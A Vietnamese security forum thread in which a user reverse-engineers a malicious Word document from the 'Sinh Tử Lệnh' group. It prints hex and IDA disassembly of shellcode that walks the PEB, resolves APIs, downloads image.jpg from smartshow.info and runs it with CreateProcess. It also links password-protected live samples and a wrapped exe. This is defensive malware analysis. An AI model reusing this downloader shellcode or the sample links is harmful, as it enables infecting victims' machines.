Latest posts for the topic "RCE đám virus của Sinh Tử Lệnh."

RCE đám virus của Sinh Tử Lệnh.

TQN — GMT

Nói trước: Em vốn dốt văn, trình bày, viết văn rất dở, hay sai lỗi hỏi ngã. Nên đọc thấy sai, thấy dở thì thông cảm, bỏ qua, khỏi đọc tiếp. Giới thiệu: Chắc các bạn ở đây đều biết về đám Sinh Tử Lệnh, và chắc phải nhủ thầm: "Đám này ghê gớm thật", và tui cũng nghĩ vậy. Trong quá trình RE một số con malware của đám này, tui cũng phải thốt lên: Kinh thật, ghê ghớm thật. Trình độ code malware và hệ thống của tụi này rất khá, rất chuyên nghiệp. Chúng dùng nhiều kỹ thuật undocument, ít thấy trong giới viết malware thế giới và hầu như chưa thấy trong đám script kiddie viết virus của VN ta. Nhiều đoạn code tui thấy quen quen nhưng không thể nhớ và nói chính xác là đã gặp ở đâu. Chuyện bắt đầu từ cái topic năm ngoái về việc anh conmale, admin của diển đàn chúng ta bị đám STL cài keylog và ăn cắp password. Các bạn có thể search xem lại. Lúc ấy tui có pm anh conmale và được anh gởi cho 1 file MS Word, có name: "Danh sach IP.doc". Anh conmale compress lại và gởi cho tui. Mọi chuyện bắt đầu từ đây, tui cũng bị mất password HVA cũng vì file này. File này được tui upload lên mediafire tại: http://www.mediafire.com/?idgejaug9gnjoj2, password = malware. Quên nói là các bạn không nên mở file .doc này bằng MS Word. Dính malware của STL liền đấy. Havythoai cũng đã hỏi tui file này nhưng lúc đó lu bu và lười quá nên chưa gởi cho Havythoai. Sorry Thoại nhé. Lúc đó máy tui cài MS Security Essential (cờ rắc để pass WPA), tui đã quét thử file .doc này nhưng MSSE không phát hiện ra. Thậm chí tới bây giờ KAV 2011 (bản quyền đàng hoàng nha) vẫn không phát hiện ra:

Lúc đó thì cái VM trên Virtual PC của tui bị hư, lại vừa mới đi nhậu về, chủ quan sau khi quét xong thấy không có gì liền open ngay. Kết quả, Word đơ luôn. Kill nó, cúp đi ngủ. Sáng ra thấy máy là lạ, phát hiện ra một đống file lạ ngay. Tới tận bây giờ, VirusToal và ThreadExpert vẫn không phát hiện ra malware trong file .doc này. Dưới đây là kết quả của 2 trang Online Scan đó: 1. http://www.threatexpert.com/report.aspx?md5=386c739a66934bdc84dbd62f335a0f76 2. http://www.virustotal.com/file-scan/report.html?id=381a690f90ce769dd9f323709a54a0cfd62cf516f8dfe2a2c1996e419f591461-1305993552 Tất cả các AV đều không phát hiện ra exploit bug trong file .doc này. Điều này chứng tỏ exploit bug này là undocument, đã có từ năm ngoái và tới bây giờ vẫn không công bố. Và tui dám 90% chắc chắn là exploit này không thể do người VN trong nước phát hiện ra (vì tui nghĩ nếu người VN ta mà phát hiện ra thì đã um xùm lên rồi). Tui sẽ không phân tích kỹ thuật của exploit này, chỉ tập trung vào phân tích cách xác định shellcode trong file .doc và disassembly/debug xem nó làm gì. Còn exploit thì sẽ có ở topic khác. PS: Anh em STL vào đây thấy em nói gì sai thì ra mặt chỉ bảo cho newbie như em nhé. Em biết có mấy anh vẫn ở đây thôi.

Tìm và phân tích shellcode của file .doc

TQN — GMT

Em vừa chạy ra ngoài, mua mấy lon bia và gói Mèo. Không biết có đủ siêng để post hết không. Gõ và cut, upload hình mệt quá. Tiếp tục nhé, chúng ta sẽ đi phân tích và tìm shellcode trong file .doc này. Đầu tiên, và hồi đó, tui dùng OffVis http://go.microsoft.com/fwlink/?LinkId=158791để mở file .doc này lên, xem nó có dùng những well-known exploit nào, hoàn toàn không có.

Chỉ là warning của OffVis do file .doc corrupt nên OffVis không xác định được CVE chính xác, chỉ đưa ra warning: CVE-2006-4534 Tiếp tục, dùng OfficeCat http://www.snort.org/vrt/vrt-resources/officecat để scan, cũng không thấy gì cả, chỉ báo file corrup. Đúng như kết quả của OffVis đưa ra.

Tiếp tục, như các bạn biết, có rất nhiều trình HexEditor, nhưng để analyzer file format thì theo tui tốt nhất và tui đang dùng là 101 Editor và FileInsight. Nhưng 101 Editor là trình "xe que", phải mua (nhưng em thì vẫn đang dùng bản cờ rắc tìm trên Internet ;)), nên em dùng FileInsight http://www.mcafee.com/us/downloads/free-tools/index.aspx để analyzer sơ bộ. Mở file .doc trong FileInsight, sờ cờ ron tới ron lui lòi ra điểm khả nghi:

Các bạn sẽ thấy ngay các string lộn xộn đó chính là các hàm API quen thuộc mà shellcode thường dùng: GetTempFileNameW, GetTempPathW, RtlZeroMemory, URLDownloadToFile, LoadLibaryA... Các string này không liền kề nhau, vì các bạn để ý đến left panel bên tay phải, của sổ Disassembly, sẽ thấy là code của STL move từng dword 1 chứa 4 ký tự của các hàm API vào các buffer liền kề nhau (mấy ông nội, sao không đảo thứ tự của các buffer này đi, nếu đảo thì tui tìm sao ra !?) Tui post chưa xong mà khách ở đâu vào topic này lắm thế: 6 khách rồi à ?

RCE virus của đám Sinh Tử Lệnh.

TQN — GMT

Vậy là ta chắc chắn file doc này có chứa shellcode, vấn đề của chúng ta tiếp tục làm là phải extract được shellcode này, xác định được entry point của shellcode, disassembly và debug shellcode, xem thử shellcode này download cái gì về máy tui và máy anh conmale, xác định URL và Whois data của URL đó. Tool use: OllyDbg, IDA, whois. Nhưng giờ gần 12h30 rồi, em buồn ngủ quá, xin phép em nghỉ, mai post tiếp. Ngày mai em còn phải hàn, cắt một đống sắt nữa. Mắt em đỏ ngầu rồi.

RCE đám virus của Sinh Tử Lệnh.

xnohat — GMT

Lão up image qua một host khác được không ? Imageshack hình như nó banned HVA domain. Tớ đã add nhiều lần nhưng bọn này nhất quyết không chịu accept HVA domain. Các hình đều hiện con ếch zàng T_T

RCE đám virus của Sinh Tử Lệnh.

TQN — GMT

Bà con khác xem có được hình không vậy ? Ngán nhất là cái capture, up hình !

RCE đám virus của Sinh Tử Lệnh.

Ikut3 — GMT

Hình xem tốt anh TQN. Tiếp đi anh ;) Imageshack bỏ cái trò bắt register mới view được hình anh P ơi

RCE đám virus của Sinh Tử Lệnh.

tranhuuphuoc — GMT

TQN wrote:

Bà con khác xem có được hình không vậy ? Ngán nhất là cái capture, up hình !

Anh cứ việc upload lên site nào đó, em sẽ điều chỉnh bài viết của anh, upload hình bài viết lên thư mục hình ảnh trên server của HVA để khỏi bị ban, xoá hình cho anh em tiện việc tham khảo, trao đổi, thảo luận. Em và anh em khác đang mong đợi các bài viết phân tích của anh ;-)

RCE đám virus của Sinh Tử Lệnh.

quanta — GMT

Hay quá! Anh vẫn chưa đi mua bia về để viết tiếp à?

TQN wrote:

... Mọi chuyện bắt đầu từ đây, tui cũng bị mất password HVA cũng vì file này. File này được tui upload lên mediafire tại: http://www.mediafire.com/?idgejaug9gnjoj2, password = malware. Quên nói là các bạn không nên mở file .doc này bằng MS Word. Dính malware của STL liền đấy.

Em thử tải về và extract ra thì được file .bin mà:

$ file virus.doc.bin virus.doc.bin: Composite Document File V2 Document, Little Endian, Os 0, Version: 3.10, Create Time/Date: Sun Feb 11 19:56:00 1996, Last Printed: Sat Feb 24 14:11:00 1996, Last Saved Time/Date: Sun Mar 3 18:23:00 1996, Number of Words: 5370, Number of Characters: 30612, Total Editing Time: 01:01:00, Number of Pages: 17, Security: 0

Thử với `strings`: Code:

eeb53 GetT
  eeb5d empF
  eeb67 ileN
  eeb71 ameW
  eeb82 GetT
  eeb8c empP
  eeb96 athW
  eeba7 RtlZ
  eebb1 eroM
  eebbb emorf
  eebce Urlm
  eebd8 on.df
  eebf2 URLD
  eebfc ownl
  eec06 oadT
  eec10 oFilf
  eec2a Load
  eec34 Libr
  eec3e aryA
  eecd8 WVUR
  eecf4 8GetPu/
  eecfe rocAu&
  eed07 ddreu
  eed33 Z]^_3
  eee4f Crea
  eee59 tePr
  eee63 ocesf
  eeef7 Term
  eef01 inat
  eef0b ePro
  eef15 cess
  ef81b Normal

hay `bvi`: Code:

000EEB44  33 C0 66 89 85 4E FD FF FF C7 85 F4 FC FF FF 47 65 74 54 C7 85 F8 FC FF FF 65 6D 70 3.f..N.........GetT......emp
000EEB60  46 C7 85 FC FC FF FF 69 6C 65 4E C7 85 00 FD FF FF 61 6D 65 57 C6 85 04 FD FF FF 00 F......ileN......ameW.......
000EEB7C  C7 85 DC FC FF FF 47 65 74 54 C7 85 E0 FC FF FF 65 6D 70 50 C7 85 E4 FC FF FF 61 74 ......GetT......empP......at
000EEB98  68 57 C6 85 E8 FC FF FF 00 C7 85 C4 FC FF FF 52 74 6C 5A C7 85 C8 FC FF FF 65 72 6F hW.............RtlZ......ero
000EEBB4  4D C7 85 CC FC FF FF 65 6D 6F 72 66 C7 85 D0 FC FF FF 79 00 C7 85 B0 FC FF FF 55 72 M......emorf......y.......Ur
000EEBD0  6C 6D C7 85 B4 FC FF FF 6F 6E 2E 64 66 C7 85 B8 FC FF FF 6C 6C C6 85 BA FC FF FF 00 lm......on.df......ll.......
000EEBEC  C7 85 90 FC FF FF 55 52 4C 44 C7 85 94 FC FF FF 6F 77 6E 6C C7 85 98 FC FF FF 6F 61 ......URLD......ownl......oa
000EEC08  64 54 C7 85 9C FC FF FF 6F 46 69 6C 66 C7 85 A0 FC FF FF 65 57 C6 85 A2 FC FF FF 00 dT......oFilf......eW.......
000EEC24  C7 85 78 FC FF FF 4C 6F 61 64 C7 85 7C FC FF FF 4C 69 62 72 C7 85 80 FC FF FF 61 72 ..x...Load..|...Libr......ar
000EEC40  79 41 C6 85 84 FC FF FF 00 C7 85 3C FC FF FF 6B 00 65 00 C7 85 40 FC FF FF 72 00 6E yA.........<...k.e...@...r.n
000EEC5C  00 C7 85 44 FC FF FF 65 00 6C 00 66 C7 85 48 FC FF FF 33 00 66 C7 85 4A FC FF FF 32 ...D...e.l.f..H...3.f..J...2
000EEC78  00 C7 85 4C FC FF FF 2E 00 64 00 C7 85 50 FC FF FF 6C 00 6C 00 66 C7 85 54 FC FF FF ...L.....d...P...l.l.f..T...
000EEC94  00 00 33 C0 64 8B 15 30 00 00 00 8B 52 0C 8B 52 14 33 F6 33 FF 8B 12 83 FA 00 74 1C ..3.d..0....R..R.3.3......t.
000EECB0  8B 72 28 8D BD 3C FC FF FF B9 0D 00 00 00 56 57 E8 32 FC FF FF 83 F8 00 74 03 EB DD .r(..<........VW.2......t...
000EECCC  CC 8B 52 10 89 95 64 FD FF FF 8B DA 57 56 55 52 8B C3 8B E8 03 40 3C 8B 78 78 03 FD ..R...d.....WVUR.....@<.xx..
000EECE8  8B 77 20 03 F5 33 D2 8B 06 03 C5 81 38 47 65 74 50 75 2F 81 78 04 72 6F 63 41 75 26 .w ..3......8GetPu/.x.rocAu&
000EED04  81 78 08 64 64 72 65 75 1D 66 81 78 0C 73 73 75 15 8B 47 24 03 C5 0F B7 1C 50 8B 47 .x.ddreu.f.x.ssu

Em thì mù tịt khoản này vì thiếu kiến thức căn bản nhưng mà cũng thích ngồi mày mò, nghịch ngợm.

TQN wrote:

Vậy là ta chắc chắn file doc này có chứa shellcode, vấn đề của chúng ta tiếp tục làm là phải extract được shellcode này,

Dùng cái MalHost-Setup trong OfficeMalScanner được không anh?

TQN wrote:

xác định được entry point của shellcode,

Có gì nhờ anh giải thích kỹ chỗ này nhé.

TQN wrote:

disassembly và debug shellcode, xem thử shellcode này download cái gì về máy tui và máy anh conmale,

Em thử với `objdump`, nhưng mà nhìn vào... hoa cả mắt.

RCE đám virus của Sinh Tử Lệnh.

TQN — GMT

Sorry đã để anh em đợi lâu. Chiều hôm qua về đi nhậu với lính, quắc cần câu luôn (nhưng vẫn còn kịp lấy số đt của em tiếp viên). Sáng giờ mệt quá, ở nhà luôn, đầu còn ngu ngu. Nhưng tối nay em về nhà máy rồi, khoảng gần 10 ngày nữa mới vô, nên tranh thủ post cho xong phần debug và tìm URL của con shellcode này. Như các bạn đã tìm hiểu về shellcode thì sẽ biết, shellcode thường bằng đầu một loạt các lệnh nop, mã hex = 0x90, sau đó sẽ tới các lệnh function prolog thông dụng (ai muốn hiểu rõ thì hỏi lamer): Code:

push ebp
mov ebp,esp
sub esp, xxxx
........

Chuỗi hex opcode của 3 lệnh trên = 55 8B EC 81 EC. Hoặc shellcode có thể bắt đầu = code: pushad (0x60), pushfd (0x90). Ta dùng chính FileInsight, disassembly mode recursively, search 90 90 90 90, ta sẽ tìm được 2 buffer 0x90 lớn, bắt đầu tại offset: 0xEE870, size = 100d và 0xEEF40, size = 1256d bytes. Tại offset 0xEE8D4, ta thấy ngay mã 55 8B EC cần tìm. Đây chính là entry point của shellcode. Dùng Find của FileInsight, tìm chuỗi hex 55 8B EC, ta chỉ found duy nhất tại điểm đấy. Shellcode thường chỉ có 1, ít khi 2, nhưng để an toàn, ta tìm tiếp byte 60 90 và 90 60, không có. Vậy thì tạm kết luận entrypoint của shellcode ở 0xEE8D4:

Tiếp tục, chúng ta đã xác định được shellcode, giờ thì làm sao debug và disassembly nó. Có rất nhiều cách: 1. Cách đơn giản nhất, patch byte tại EP của shellcode thành Int 3 (0xCC) hay 0xEB 0xFE rồi run Word dưới trình debug. Cách này tui sẽ post ở topic khác để tìm hiểu lỗi parser của Word với OLEStream dị dạng này. 2. Copy đoạn hex code trên từ 0xEE8D4 tới 0xEEF39 rồi dùng các tool, các source shellcode2exe để tạo ra exe rồi analyze và debug. 3. Dùng tool có sẵn. Em chọn cách này, nhanh khoẻ cho rồi. Như quanta đã nói, Frank Boldewin (một trong những guru về RCE mà em ngưỡng mộ) có viết tool: OfficeMalScanner [ http://www.reconstructer.org/code/OfficeMalScanner.zip]. Ver hiện tại là 0.53, phát hiện được shellcode trong file .doc này. Hồi đó ver 0.3x thì khi em dùng scan thì không. Các bạn gõ dùng cmdline với options: scan brute debug thì sẽ thấy kết quả giống như kết quả ta đã phát hiện ra trong FileInsight:

Shellcode của tụi STL này có hai điểm dở (sorry mấy đại ca nhé): 1. Đã biết truy xuất PEB address để lấy kernel32.dll base mà không tự parse để address của các hàm API cần dùng mà phải dùng GetProcAddress để lấy. 2. Không dùng API hash để lấy API address Vì vậy mấy cái string API name mới hiện ra như vậy. Tiếp tục dùng ct MalHost-Setup.exe trong bộ OfficeMalScanner để tạo exe shellcode để debug:

MalHost-Setup.exe virus.doc virus.exe 0xEE8D4

Vậy là ta có file virus.exe wrap shellcode. File .exe mà MalHost-Setup sinh ra wrap shellcode = Overlay. Khi run nó sẽ extract shellcode ra thư mục %Temp% với tên file là droppedmal, rồi lại load ngược lại file đó = Memory Mapping API, rồi jump ới EP của shellcode (Quái, sao không jump thẵng luôn cho rồi !?)

File virus.exe tui up tại: http://www.mediafire.com/?0zbhz8kahcefijb, password=malware. File này bị các AV detect nên các bạn phải tạm thời tắt AV, không được run, đặt breakpoint tại 0x00401485 để debug shellcode. Các bạn có thể dùng IDA hay OllyDbg hay bất cứ trình debug nào. Em dùng cả IDA và OllyDbg.

RCE đám virus của Sinh Tử Lệnh.

TQN — GMT

Debug vào shellcode, các bạn sẽ thấy ngay URL của file được download về máy victim (là máy em và máy anh conmale chứ ai).

Kết quả Whois: Code:

Domain ID:D32531112-LRMS
Domain Name:SMARTSHOW.INFO
Created On:22-Apr-2010 11:06:53 UTC
Last Updated On:03-May-2011 03:00:45 UTC
Expiration Date:22-Apr-2012 11:06:53 UTC
Sponsoring Registrar:OnlineNIC, Inc. (R170-LRMS)
Status:CLIENT HOLD
Status:CLIENT TRANSFER PROHIBITED
Registrant ID:OLNI_196680_0_0
Registrant Name:Domain ID Shield Service
Registrant Organization:Domain ID Shield Service CO., Limited
Registrant Street1:1102-1103,11/F,Kowloon Bldg.,555 Nathan Rd.,Mongkok,Kowloon
Registrant Street2:
Registrant Street3:
Registrant City:Hong Kong
Registrant State/Province:Hong Kong
Registrant Postal Code:999077
Registrant Country:CN
Registrant Phone:+852.22060092
Registrant Phone Ext.:
Registrant FAX:+852.30030133
Registrant FAX Ext.:
Registrant Email:sm324544432187684@domainidshield.com
Admin ID:OLNI_196680_1_0
Admin Name:Domain ID Shield Service
Admin Organization:Domain ID Shield Service CO., Limited
Admin Street1:1102-1103,11/F,Kowloon Bldg.,555 Nathan Rd.,Mongkok,Kowloon
Admin Street2:
Admin Street3:
Admin City:Hong Kong
Admin State/Province:Hong Kong
Admin Postal Code:999077
Admin Country:CN
Admin Phone:+852.22060092
Admin Phone Ext.:
Admin FAX:+852.30030133
Admin FAX Ext.:
Admin Email:sm324544418797681@domainidshield.com
Billing ID:OLNI_196680_3_0
Billing Name:Domain ID Shield Service
Billing Organization:Domain ID Shield Service CO., Limited
Billing Street1:1102-1103,11/F,Kowloon Bldg.,555 Nathan Rd.,Mongkok,Kowloon
Billing Street2:
Billing Street3:
Billing City:Hong Kong
Billing State/Province:Hong Kong
Billing Postal Code:999077
Billing Country:CN
Billing Phone:+852.22060092
Billing Phone Ext.:
Billing FAX:+852.30030133
Billing FAX Ext.:
Billing Email:sm324544489757683@domainidshield.com
Tech ID:OLNI_196680_2_0
Tech Name:Domain ID Shield Service
Tech Organization:Domain ID Shield Service CO., Limited
Tech Street1:1102-1103,11/F,Kowloon Bldg.,555 Nathan Rd.,Mongkok,Kowloon
Tech Street2:
Tech Street3:
Tech City:Hong Kong
Tech State/Province:Hong Kong
Tech Postal Code:999077
Tech Country:CN
Tech Phone:+852.22060092
Tech Phone Ext.:
Tech FAX:+852.30030133
Tech FAX Ext.:
Tech Email:sm324544451417682@domainidshield.com
Name Server:NS1.BYETHOST42.ORG
Name Server:NS2.BYETHOST42.ORG

Lại là HongKong, CN nữa. Host này không còn hoạt động nữa nên file image.jpg em không lấy về được, còn file mà hồi đó nó drop vào máy em thì em xoá 3 đời 8 hoánh rồi. Bây giờ em cũng mệt rồi, nên em chỉ nói ngắn gọn các công đoạn của shellcode: 1. Tạo URL string. 2. Tạo API name bằng cách mov từng DWORD API name vào buffer. 3. Lấy PEB address, duyệt module link list để lấy kernel32.dll base address 4. Scan export table của kernel32.dll để lấy address của GetProcAddress 5. Download file image.jpg về %Temp%\randomname 6. Nếu download thành công, call CreateProcess với param là file jpg đó. File đó thực chất là file exe, mở đường cho download một loạt malware khác của mấy "ông nội" STL về máy victim (lại victim nữa, nhắc lại niềm đau của em). 7. Nếu download không thành công, TerminateProcess luôn (WinWord đi luôn). Code ASM của ShellcodeProc: Code:

debug008:00148C72      @@BuildURL:                             ; CODE XREF: ShellcodeProc+1Ej
debug008:00148C72  548 sub     esp, 100h
debug008:00148C78  648 mov     eax, 'h'
debug008:00148C7D  648 mov     [ebp+szURL], ax
debug008:00148C84  648 mov     eax, 't'
debug008:00148C89  648 mov     [ebp-2EEh], ax
debug008:00148C90  648 mov     eax, 't'
debug008:00148C95  648 mov     [ebp+var_2EC], ax
debug008:00148C9C  648 mov     eax, 'p'
debug008:00148CA1  648 mov     [ebp+var_2EA], ax
debug008:00148CA8  648 mov     eax, ':'
debug008:00148CAD  648 mov     [ebp+var_2E8], ax
debug008:00148CB4  648 mov     eax, '/'
debug008:00148CB9  648 mov     [ebp+var_2E6], ax
debug008:00148CC0  648 mov     eax, '/'
debug008:00148CC5  648 mov     [ebp+var_2E4], ax
debug008:00148CCC  648 mov     eax, 's'
debug008:00148CD1  648 mov     [ebp+var_2E2], ax
debug008:00148CD8  648 mov     eax, 'm'
debug008:00148CDD  648 mov     [ebp+var_2E0], ax
debug008:00148CE4  648 mov     eax, 'a'
debug008:00148CE9  648 mov     [ebp+var_2DE], ax
debug008:00148CF0  648 mov     eax, 'r'
debug008:00148CF5  648 mov     [ebp+var_2DC], ax
debug008:00148CFC  648 mov     eax, 't'
debug008:00148D01  648 mov     [ebp+var_2DA], ax
debug008:00148D08  648 mov     eax, 's'
debug008:00148D0D  648 mov     [ebp+var_2D8], ax
debug008:00148D14  648 mov     eax, 'h'
debug008:00148D19  648 mov     [ebp+var_2D6], ax
debug008:00148D20  648 mov     eax, 'o'
debug008:00148D25  648 mov     [ebp+var_2D4], ax
debug008:00148D2C  648 mov     eax, 'w'
debug008:00148D31  648 mov     [ebp+var_2D2], ax
debug008:00148D38  648 mov     eax, '.'
debug008:00148D3D  648 mov     [ebp+var_2D0], ax
debug008:00148D44  648 mov     eax, 'i'
debug008:00148D49  648 mov     [ebp+var_2CE], ax
debug008:00148D50  648 mov     eax, 'n'
debug008:00148D55  648 mov     [ebp+var_2CC], ax
debug008:00148D5C  648 mov     eax, 'f'
debug008:00148D61  648 mov     [ebp+var_2CA], ax
debug008:00148D68  648 mov     eax, 'o'
debug008:00148D6D  648 mov     [ebp+var_2C8], ax
debug008:00148D74  648 mov     eax, '/'
debug008:00148D79  648 mov     [ebp+var_2C6], ax
debug008:00148D80  648 mov     eax, 'i'
debug008:00148D85  648 mov     [ebp+var_2C4], ax
debug008:00148D8C  648 mov     eax, 'm'
debug008:00148D91  648 mov     [ebp+var_2C2], ax
debug008:00148D98  648 mov     eax, 'a'
debug008:00148D9D  648 mov     [ebp+var_2C0], ax
debug008:00148DA4  648 mov     eax, 'g'
debug008:00148DA9  648 mov     [ebp+var_2BE], ax
debug008:00148DB0  648 mov     eax, 'e'
debug008:00148DB5  648 mov     [ebp+var_2BC], ax
debug008:00148DBC  648 mov     eax, '.'
debug008:00148DC1  648 mov     [ebp+var_2BA], ax
debug008:00148DC8  648 mov     eax, 'j'
debug008:00148DCD  648 mov     [ebp+var_2B8], ax
debug008:00148DD4  648 mov     eax, 'p'
debug008:00148DD9  648 mov     [ebp+var_2B6], ax
debug008:00148DE0  648 mov     eax, 'g'
debug008:00148DE5  648 mov     [ebp+var_2B4], ax
debug008:00148DEC
debug008:00148DEC      @@BuildAPINames:
debug008:00148DEC  648 xor     eax, eax
debug008:00148DEE  648 mov     [ebp+var_2B2], ax
debug008:00148DF5  648 mov     [ebp+szGetTempFileNameW], 'TteG'
debug008:00148DFF  648 mov     [ebp+var_308], 'Fpme'
debug008:00148E09  648 mov     [ebp+var_304], 'Neli'
debug008:00148E13  648 mov     [ebp+var_300], 'Wema'
debug008:00148E1D  648 mov     [ebp+var_2FC], 0
debug008:00148E24  648 mov     [ebp+szGetTempPathW], 'TteG'
debug008:00148E2E  648 mov     [ebp+var_320], 'Ppme'
debug008:00148E38  648 mov     [ebp+var_31C], 'Whta'
debug008:00148E42  648 mov     [ebp+var_318], 0
debug008:00148E49  648 mov     [ebp+szRtlZeroMemory], 'ZltR'
debug008:00148E53  648 mov     [ebp+var_338], 'More'
debug008:00148E5D  648 mov     [ebp+var_334], 'rome'
debug008:00148E67  648 mov     [ebp+var_330], 79h
debug008:00148E70  648 mov     [ebp+szUrlmon.dll], 'mlrU'
debug008:00148E7A  648 mov     [ebp+var_34C], 'd.no'
debug008:00148E84  648 mov     [ebp+var_348], 'll'
debug008:00148E8D  648 mov     [ebp+var_346], 0
debug008:00148E94  648 mov     [ebp+szURLDownloadToFile], 'DLRU'
debug008:00148E9E  648 mov     [ebp+var_36C], 'lnwo'
debug008:00148EA8  648 mov     [ebp+var_368], 'Tdao'
debug008:00148EB2  648 mov     [ebp+var_364], 'liFo'
debug008:00148EBC  648 mov     [ebp+var_360], 'We'
debug008:00148EC5  648 mov     [ebp+var_35E], 0
debug008:00148ECC  648 mov     [ebp+szLoadLibraryA], 'daoL'
debug008:00148ED6  648 mov     [ebp+var_384], 'rbiL'
debug008:00148EE0  648 mov     [ebp+var_380], 'Ayra'
debug008:00148EEA  648 mov     [ebp+var_37C], 0
debug008:00148EF1  648 mov     [ebp+var_3C4], 65006Bh ;  ; kernel32.dll string in Unicode
debug008:00148EFB  648 mov     [ebp+var_3C0], 6E0072h ; 
debug008:00148F05  648 mov     [ebp+var_3BC], 6C0065h ; 
debug008:00148F0F  648 mov     [ebp+var_3B8], '3'
debug008:00148F18  648 mov     [ebp+var_3B6], '2'
debug008:00148F21  648 mov     [ebp+var_3B4], 64002Eh
debug008:00148F2B  648 mov     [ebp+var_3B0], 6C006Ch ; 
debug008:00148F35  648 mov     [ebp+var_3AC], 0
debug008:00148F3E  648 xor     eax, eax
debug008:00148F40  648 mov     edx, large fs:30h
debug008:00148F47  648 mov     edx, [edx+0Ch]
debug008:00148F4A  648 mov     edx, [edx+14h]
debug008:00148F4D  648 xor     esi, esi
debug008:00148F4F  648 xor     edi, edi
debug008:00148F4F
debug008:00148F51
debug008:00148F51      loc_148F51:                             ; CODE XREF: ShellcodeProc+3F6j
debug008:00148F51  648 mov     edx, [edx]
debug008:00148F53  648 cmp     edx, 0
debug008:00148F56  648 jz      short loc_148F74
debug008:00148F56
debug008:00148F58  648 mov     esi, [edx+28h]
debug008:00148F5B  648 lea     edi, [ebp+var_3C4]
debug008:00148F61  648 mov     ecx, 0Dh
debug008:00148F66  648 push    esi
debug008:00148F67  64C push    edi
debug008:00148F68  650 call    @@FindKernel32Base
debug008:00148F68
debug008:00148F6D  650 cmp     eax, 0
debug008:00148F70  650 jz      short @@FindGetProcAddress
debug008:00148F70
debug008:00148F72  650 jmp     short loc_148F51
debug008:00148F72
debug008:00148F74      ; ---------------------------------------------------------------------------
debug008:00148F74
debug008:00148F74      loc_148F74:                             ; CODE XREF: ShellcodeProc+3DAj
debug008:00148F74  648 int     3                               ; Trap to Debugger
debug008:00148F74
debug008:00148F75
debug008:00148F75      @@FindGetProcAddress:                   ; CODE XREF: ShellcodeProc+3F4j
debug008:00148F75  648 mov     edx, [edx+10h]
debug008:00148F78  648 mov     [ebp+hKernel32], edx
debug008:00148F7E  648 mov     ebx, edx
debug008:00148F80  648 push    edi
debug008:00148F81  64C push    esi
debug008:00148F82  650 push    ebp
debug008:00148F83  654 push    edx
debug008:00148F84  658 mov     eax, ebx
debug008:00148F86  658 mov     ebp, eax
debug008:00148F88  658 add     eax, [eax+3Ch]
debug008:00148F8B  658 mov     edi, [eax+78h]
debug008:00148F8E  658 add     edi, ebp
debug008:00148F90  658 mov     esi, [edi+20h]
debug008:00148F93  658 add     esi, ebp
debug008:00148F95  658 xor     edx, edx
debug008:00148F95
debug008:00148F97
debug008:00148F97      @@IsGetProcAddress:                     ; CODE XREF: ShellcodeProc+45Dj
debug008:00148F97  658 mov     eax, [esi]
debug008:00148F99  658 add     eax, ebp
debug008:00148F9B  658 cmp     dword ptr [eax], 'PteG'
debug008:00148FA1  658 jnz     short @@NextName
debug008:00148FA1
debug008:00148FA3  658 cmp     dword ptr [eax+4], 'Acor'
debug008:00148FAA  658 jnz     short @@NextName
debug008:00148FAA
debug008:00148FAC  658 cmp     dword ptr [eax+8], 'erdd'
debug008:00148FB3  658 jnz     short @@NextName
debug008:00148FB3
debug008:00148FB5  658 cmp     word ptr [eax+0Ch], 'ss'
debug008:00148FBB  658 jnz     short @@NextName
debug008:00148FBB
debug008:00148FBD  658 mov     eax, [edi+24h]
debug008:00148FC0  658 add     eax, ebp
debug008:00148FC2  658 movzx   ebx, word ptr [eax+edx*2]
debug008:00148FC6  658 mov     eax, [edi+1Ch]
debug008:00148FC9  658 add     eax, ebp
debug008:00148FCB  658 mov     ebx, [eax+ebx*4]
debug008:00148FCE  658 add     ebx, ebp
debug008:00148FD0  658 jmp     short @@BuildAPIAddress
debug008:00148FD0
debug008:00148FD2      ; ---------------------------------------------------------------------------
debug008:00148FD2
debug008:00148FD2      @@NextName:                             ; CODE XREF: ShellcodeProc+425j
debug008:00148FD2                                              ; ShellcodeProc+42Ej
debug008:00148FD2                                              ; ShellcodeProc+437j
debug008:00148FD2                                              ; ShellcodeProc+43Fj
debug008:00148FD2  658 add     esi, 4
debug008:00148FD5  658 inc     edx
debug008:00148FD6  658 cmp     edx, [edi+14h]
debug008:00148FD9  658 jnz     short @@IsGetProcAddress
debug008:00148FD9
debug008:00148FDB
debug008:00148FDB      @@BuildAPIAddress:                      ; CODE XREF: ShellcodeProc+454j
debug008:00148FDB  658 pop     edx
debug008:00148FDC  654 pop     ebp
debug008:00148FDD  650 pop     esi
debug008:00148FDE  64C pop     edi
debug008:00148FDF  648 xor     eax, eax
debug008:00148FE1  648 mov     [ebp+GetProcAddress], ebx
debug008:00148FE7  648 lea     eax, [ebp+szRtlZeroMemory]
debug008:00148FED  648 push    eax
debug008:00148FEE  64C push    [ebp+hKernel32]
debug008:00148FF4  650 call    [ebp+GetProcAddress]
debug008:00148FF4
debug008:00148FFA  650 cmp     eax, 0
debug008:00148FFD  650 jz      @@Terminate
debug008:00148FFD
debug008:00149003  650 mov     [ebp+RtlZeroMemory], eax
debug008:00149009  650 lea     eax, [ebp+szLoadLibraryA]
debug008:0014900F  650 push    eax
debug008:00149010  654 push    [ebp+hKernel32]
debug008:00149016  658 call    [ebp+GetProcAddress]
debug008:00149016
debug008:0014901C  658 mov     [ebp+LoadLibraryA], eax
debug008:00149022  658 lea     eax, [ebp+szUrlmon.dll]
debug008:00149028  658 push    eax
debug008:00149029  65C call    [ebp+LoadLibraryA]
debug008:00149029
debug008:0014902F  65C cmp     eax, 0
debug008:00149032  65C jz      @@Terminate
debug008:00149032
debug008:00149038  65C mov     [ebp+hUrlmon.dll], eax
debug008:0014903E  65C lea     eax, [ebp+szURLDownloadToFile]
debug008:00149044  65C push    eax
debug008:00149045  660 push    [ebp+hUrlmon.dll]
debug008:0014904B  664 call    [ebp+GetProcAddress]
debug008:0014904B
debug008:00149051  664 cmp     eax, 0
debug008:00149054  664 jz      @@Terminate
debug008:00149054
debug008:0014905A  664 mov     [ebp+URLDownloadToFile], eax
debug008:00149060  664 lea     eax, [ebp+szGetTempPathW]
debug008:00149066  664 push    eax
debug008:00149067  668 push    [ebp+hKernel32]
debug008:0014906D  66C call    [ebp+GetProcAddress]
debug008:0014906D
debug008:00149073  66C cmp     eax, 0
debug008:00149076  66C jz      @@Terminate
debug008:00149076
debug008:0014907C  66C mov     [ebp+GetTempPathW], eax
debug008:00149082  66C lea     eax, [ebp+szGetTempFileNameW]
debug008:00149088  66C push    eax
debug008:00149089  670 push    [ebp+hKernel32]
